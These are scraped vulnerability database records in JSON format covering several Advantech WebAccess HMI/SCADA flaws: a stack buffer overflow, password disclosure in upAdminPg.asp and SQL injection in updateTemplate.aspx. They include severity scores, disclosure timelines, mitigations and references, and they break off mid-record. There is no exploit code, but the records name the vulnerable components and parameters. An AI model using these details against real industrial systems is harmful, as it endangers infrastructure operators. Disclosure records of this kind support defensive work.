Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0477", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-150", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-150", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C76 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3164", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-150", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "id": "VAR-201602-0477", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:09:47.590000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-150" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-150" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-150" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll NodeName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-150" } ], "trust": 0.7 } }
var-201705-2332
Vulnerability from variot
upAdminPg.asp in Advantech WebAccess before 8.1_20160519 allows remote authenticated administrators to obtain sensitive password information via unspecified vectors. Authentication is required to exploit this vulnerability.The specific flaw exists within upAdminPg.asp. One project administrator can view other project administrators' passwords along with the system administrator's password. An attacker can leverage this vulnerability to escalate privileges within the system. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech, China. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. ActiveX is one of the components used to transmit dynamic images in surveillance. A version of ActiveX prior to Advantech WebAccess 8.1_20160519 has a security vulnerability. An attacker could exploit the vulnerability to insert or run arbitrary code on an affected system
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.1_20160519" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003c8.1 20160519", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "CNNVD", "id": "CNNVD-201610-867" }, { "db": "NVD", "id": "CVE-2016-5810" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008542" } ] }, "credits": { "_id": null, "data": "Zhou Yu", "sources": [ { "db": "ZDI", "id": "ZDI-16-429" } ], "trust": 0.7 }, "cve": "CVE-2016-5810", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2016-5810", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "NONE", "baseScore": 6.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "CVE-2016-5810", "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2016-10506", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-94629", "impactScore": 2.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.2, "id": "CVE-2016-5810", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-5810", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2016-5810", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2016-5810", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2016-10506", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201610-867", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-94629", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "VULHUB", "id": "VHN-94629" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "CNNVD", "id": "CNNVD-201610-867" }, { "db": "NVD", "id": "CVE-2016-5810" } ] }, "description": { "_id": null, "data": "upAdminPg.asp in Advantech WebAccess before 8.1_20160519 allows remote authenticated administrators to obtain sensitive password information via unspecified vectors. Authentication is required to exploit this vulnerability.The specific flaw exists within upAdminPg.asp. One project administrator can view other project administrators\u0027 passwords along with the system administrator\u0027s password. An attacker can leverage this vulnerability to escalate privileges within the system. Advantech WebAccess (formerly known as BroadWin WebAccess) is a suite of browser-based HMI/SCADA software from Advantech, China. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. ActiveX is one of the components used to transmit dynamic images in surveillance. A version of ActiveX prior to Advantech WebAccess 8.1_20160519 has a security vulnerability. An attacker could exploit the vulnerability to insert or run arbitrary code on an affected system", "sources": [ { "db": "NVD", "id": "CVE-2016-5810" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "VULHUB", "id": "VHN-94629" } ], "trust": 3.06 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2016-5810", "trust": 4.0 }, { "db": "ICS CERT", "id": "ICSA-16-173-01", "trust": 3.1 }, { "db": "ZDI", "id": "ZDI-16-429", "trust": 2.4 }, { "db": "CNNVD", "id": "CNNVD-201610-867", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-10506", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2016-008542", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3746", "trust": 0.7 }, { "db": "IVD", "id": "29796EEF-56CD-4EE0-AEFC-005C9EC1B53A", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-94629", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "VULHUB", "id": "VHN-94629" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "CNNVD", "id": "CNNVD-201610-867" }, { "db": "NVD", "id": "CVE-2016-5810" } ] }, "id": "VAR-201705-2332", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "VULHUB", "id": "VHN-94629" } ], "trust": 1.474496345 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a" }, { "db": "CNVD", "id": "CNVD-2016-10506" } ] }, "last_update_date": "2024-11-23T22:01:30.496000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-173-01" }, { "title": "Advantech WebAccess ActiveX vulnerable patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/83391" }, { "title": "Advantech WebAccess ActiveX Security vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=65188" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "CNNVD", "id": "CNNVD-201610-867" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-200", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-94629" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "NVD", "id": "CVE-2016-5810" } ] }, "references": { "_id": null, "data": [ { "trust": 3.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-173-01" }, { "trust": 1.7, "url": "http://www.zerodayinitiative.com/advisories/zdi-16-429" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5810" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5810" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-429" }, { "db": "CNVD", "id": "CNVD-2016-10506" }, { "db": "VULHUB", "id": "VHN-94629" }, { "db": "JVNDB", "id": "JVNDB-2016-008542" }, { "db": "CNNVD", "id": "CNNVD-201610-867" }, { "db": "NVD", "id": "CVE-2016-5810" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a", "ident": null }, { "db": "ZDI", "id": "ZDI-16-429", "ident": null }, { "db": "CNVD", "id": "CNVD-2016-10506", "ident": null }, { "db": "VULHUB", "id": "VHN-94629", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2016-008542", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201610-867", "ident": null }, { "db": "NVD", "id": "CVE-2016-5810", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2016-11-02T00:00:00", "db": "IVD", "id": "29796eef-56cd-4ee0-aefc-005c9ec1b53a", "ident": null }, { "date": "2016-07-18T00:00:00", "db": "ZDI", "id": "ZDI-16-429", "ident": null }, { "date": "2016-11-02T00:00:00", "db": "CNVD", "id": "CNVD-2016-10506", "ident": null }, { "date": "2017-05-02T00:00:00", "db": "VULHUB", "id": "VHN-94629", "ident": null }, { "date": "2017-06-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-008542", "ident": null }, { "date": "2016-10-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201610-867", "ident": null }, { "date": "2017-05-02T14:59:00.487000", "db": "NVD", "id": "CVE-2016-5810", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2016-07-18T00:00:00", "db": "ZDI", "id": "ZDI-16-429", "ident": null }, { "date": "2016-11-02T00:00:00", "db": "CNVD", "id": "CNVD-2016-10506", "ident": null }, { "date": "2017-05-11T00:00:00", "db": "VULHUB", "id": "VHN-94629", "ident": null }, { "date": "2017-06-02T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-008542", "ident": null }, { "date": "2017-05-03T00:00:00", "db": "CNNVD", "id": "CNNVD-201610-867", "ident": null }, { "date": "2024-11-21T02:55:03.090000", "db": "NVD", "id": "CVE-2016-5810", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201610-867" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess of upAdminPg.asp Vulnerable to obtaining important password information", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-008542" } ], "trust": 0.8 }, "type": { "_id": null, "data": "information disclosure", "sources": [ { "db": "CNNVD", "id": "CNNVD-201610-867" } ], "trust": 0.6 } }
var-201702-0675
Vulnerability from variot
An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A SQL injection vulnerability exists in Advantech WebAccess version 8.1. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, modify the logic of SQL queries, compromise the software, retrieve information, or modify data; other consequences are possible as well. WebAccess 8.1 is vulnerable; other versions may also be affected
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 3.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "8.1" } ], "sources": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "BID", "id": "95410" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "CNNVD", "id": "CNNVD-201701-328" }, { "db": "NVD", "id": "CVE-2017-5154" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-001616" } ] }, "credits": { "_id": null, "data": "Tenable Network Security", "sources": [ { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "BID", "id": "95410" } ], "trust": 1.0 }, "cve": "CVE-2017-5154", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-5154", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2017-5154", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2017-00553", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 7.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "f6a19415-1129-4719-ad81-c1d464552563", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-113357", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-5154", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-5154", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-5154", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2017-5154", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2017-00553", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201701-328", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-113357", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "VULHUB", "id": "VHN-113357" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "CNNVD", "id": "CNNVD-201701-328" }, { "db": "NVD", "id": "CVE-2017-5154" } ] }, "description": { "_id": null, "data": "An issue was discovered in Advantech WebAccess Version 8.1. To be able to exploit the SQL injection vulnerability, an attacker must supply malformed input to the WebAccess software. Successful attack could result in administrative access to the application and its data files. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess. Authentication is required to exploit this vulnerability, but can be easily bypassed.The specific flaw exists within updateTemplate.aspx. The vulnerability is caused by lack of input validation before using a remotely supplied string to construct SQL queries. An attacker can use this vulnerability to disclose passwords of administrative accounts used by Advantech WebAccess. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A SQL injection vulnerability exists in Advantech WebAccess version 8.1. Advantech WebAccess is prone to an SQL-injection vulnerability and an authentication-bypass vulnerability. \nAn attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, modify the logic of SQL queries, compromise the software, retrieve information, or modify data; other consequences are possible as well. \nWebAccess 8.1 is vulnerable; other versions may also be affected", "sources": [ { "db": "NVD", "id": "CVE-2017-5154" }, { "db": "JVNDB", "id": "JVNDB-2017-001616" }, { "db": "ZDI", "id": "ZDI-17-043" }, { "db": "CNVD", "id": "CNVD-2017-00553" }, { "db": "BID", "id": "95410" }, { "db": "IVD", "id": "f6a19415-1129-4719-ad81-c1d464552563" }, { "db": "VULHUB", "id": "VHN-113357" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-5154", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-012-01", "trust": 3.4 }, { "db": "BID", "id": "95410", "trust": 2.0 }, { "db": "ZDI", "id": "ZDI-17-043", "trust": 1.6 }, { "db": "TENABLE", "id": "TRA-2017-04", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201701-328", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-00553", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-001616", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-3679", "trust": 0.7 }, { "db": "IVD", "id": "F6A19415-1129-4719-AD81-C1D464552563", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-113357", "trust": 0.1 } ], "sources": [ { "db": 